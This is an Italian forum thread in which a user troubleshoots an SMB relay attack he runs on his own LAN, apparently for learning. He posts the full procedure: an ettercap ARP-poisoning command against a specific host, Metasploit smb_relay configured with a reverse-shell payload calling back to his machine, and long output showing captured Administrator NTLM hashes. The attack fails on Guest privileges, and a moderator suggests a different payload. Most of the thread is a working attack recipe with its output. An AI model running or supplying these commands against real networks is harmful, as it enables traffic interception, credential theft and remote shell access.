[problema] Windows SMB_Relay_Exploit

[linux80]

Salve e complimenti per il forum ci voleva propio in italiano.
Allora io dopo che mi sono documentato molto su questo tipo di attacco ho voluto mettere in atto su' cio' che ho appreso (sulla mia rete lan), e devo dire la verita' non ho trovato problemi grandi...
lacio etterfilter :etterfilter smb.filtr -o smb.ef
e mi creo il filtro smb.ef

Dopo che ho fatto tutto il procedimento ho lanciato la framework metasploit in questo modo :

Code:

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(smb_relay) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(smb_relay) > exploit

e mi risponde cosi' :

Code:

[*] Started reverse handler[*] Server started.

poi lancio ettercap :

Code:

ettercap -T -q -F smb.ef -M ARP /192.168.1.219/ // -P autoadd -i wlan0

che mi risponde cosi':

Code:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from smb.ef...
Listening on wlan0... (Ethernet)

 wlan0 ->	00:21:5C:5B:78:3D     192.168.1.101     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.219 00:21:00:A7:73:2C

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating autoadd plugin...

Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":314BB7C384593DD443F91FEAF2326D43AF1A88BDA1960CD3:4DA5D30CAAD1D1E4BBCEC8B6693C400B5E1D9473424237D4:FD43469EB47B7334 DOMAIN: ROSA-05AA89B2DC
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":333A14003623CB05F891582CC563BFF2E93C97CB73DAA14E:478D5B65AACA953D89FB93B35C8A4584D3A672CD85789227:07E53BAB55E2A30C DOMAIN: ROSA-05AA89B2DC
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":B61EE890E9CB128759B3811A16AE0E2BD06512E74987045E:F7D041DC3A3EB9DA7F51B73F62302290F7C87DF97CB20906:669576B1CB6139DE DOMAIN: ROSA-05AA89B2DC
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":767E2FE48A98D3584DE30B198B245376C9B72C77AD71DA80:1B832A99DA71AC94DBE2B6A36B8658F422CF0723B08B124B:80EE4F0BBE043EB2 DOMAIN: ROSA-05AA89B2DC


mentre nella shell dove ho lanciato la metasploit mi risponde in questo altro modo:
*] Received 192.168.1.219:1083 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1083 \[*] Received 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator LMHASH:51fc5aa9fa03b225c554178c8e3d26165a4d84307fea1452 NTHASH:1f8d89cf41613d62a722874989f8071df2ee1436e73db7aa OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
 [*] Sending Access Denied to 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1088 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1088 \[*] Received 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator LMHASH:314bb7c384593dd443f91feaf2326d43af1a88bda1960cd3 NTHASH:4da5d30caad1d1e4bbcec8b6693c400b5e1d9473424237d4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
 [*] Sending Access Denied to 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1090 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1090 \[*] Received 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator LMHASH:333a14003623cb05f891582cc563bff2e93c97cb73daa14e NTHASH:478d5b65aaca953d89fb93b35c8a4584d3a672cd85789227 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
 [*] Sending Access Denied to 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1094 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1094 \[*] Received 192.168.1.219:1094 ROSA-05AA89B2DC\Administrator LMHASH:69eef1310ae7f64ffd17c6cd0caaffa57fcf27a367bfb8c2 NTHASH:400902aab37704d33435c211d85a4dff5bf9a3056bf6d709 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...[*] Sending Access Denied to 192.168.1.219:1101 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1105 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1105 \[*] Received 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator LMHASH:767e2fe48a98d3584de30b198b245376c9b72c77ad71da80 NTHASH:1b832a99da71ac94dbe2b6a36b8658f422cf0723b08b124b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
 [*] Sending Access Denied to 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1107 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1107 \[*] Received 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator LMHASH:98c0c5fbfb87fbc3adb95b2db6578a4445e3345fc51f587c NTHASH:53f951431ed067d70f98715c319c186756a774e23f01b989 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
 [*] Sending Access Denied to 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1109 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1109 \[*] Received 192.168.1.219:1109 ROSA-05AA89B2DC\Administrator LMHASH:3f054f5f7de50f747787772ef1ff004d726ea4b233e2014b NTHASH:8a5c477a0e529d542b4aa2b6eadf4a3887928bb03804ef9d OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
 .

praticamente dice che L'host remoto ha fornito soltanto noi con i privilegi del cliente. Si prega di assicurarsi che il nome utente e la password corretti sono stati forniti. I sistemi Windows XP che non fanno parte di un dominio solo i privilegi di account di accesso del cliente alla rete per impostazione predefinita.
cosa significa? come devo risolvere per far avvenire l'attacco completo .
GRAZIE A TUTTI ...



.

[brigante]

ancora una volta, leggiti il rergolamento, hai aperto 2 post per la stessa domanda - quando devi postare del codice usa i tag CODE

[linux80]

scusa brigante allora mi sai dire a che dovuto questo errore:

Code:

[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by

GRAZIE

[brigante]

basta tradurre, controlla se il payload è quello giusto

magari leggi anche il pdf pubblicato in pool.backtrack.it nell' apposita sezione.

[linux80]

PAYLOAD che ho usato e' stato questo set PAYLOAD windows/shell_reverse_tcp , l'ho configurato ma non so' come mai mi da questo errore dice che :host remoto ha fornito soltanto noi con i privilegi del cliente. Si prega di assicurarsi che il nome utente e la password corretti sono stati forniti
Quello che ho potuto capire forse l'atro mio pc(dove ho compito l'attacco ) e patchato a questo tipo di attacco ,pero' io devo capire perche', sarei grado a tutti di aiutarmi a capire questo errore, grazie..
Bello il pdf con la spiegazione ben fatto e moto chiaro...

[brigante]

infatti io t' ho detto di leggere il pdf perché c'é descritto che :

Code:

windows/shell/reverse_tcp

e

Code:

windows/shell_reverse_tcp

sono due payload diversi, che vanno scelti secondo il grado di patch applicate al sistema vittima.

[linux80]

niente ho provato anche con :

Code:

windows/shell/reverse_tcp

mi da' sempre il solito errore
Scusa per questo tipo di attacco, il pc della vittima deve avere della cartelle condivise oppure no....
GRAZIE

[brigante]

Quote:

Scusa per questo tipo di attacco, il pc della vittima deve avere della cartelle condivise oppure no....

queste sono cose che devi sapere tu, prima ancora della scelta dell' exploit.

[linux80]

cosa significa ,chiedo a voi perche' siete piu' esperti ,perche' io non ho creato nessuna condivisione sul pc che ho attaccato....e chiedevo a voi essendo che questo metasploit sfrutta la condivisione non e che e propio questo che mi provoca questo errore ,o mi sbaglio..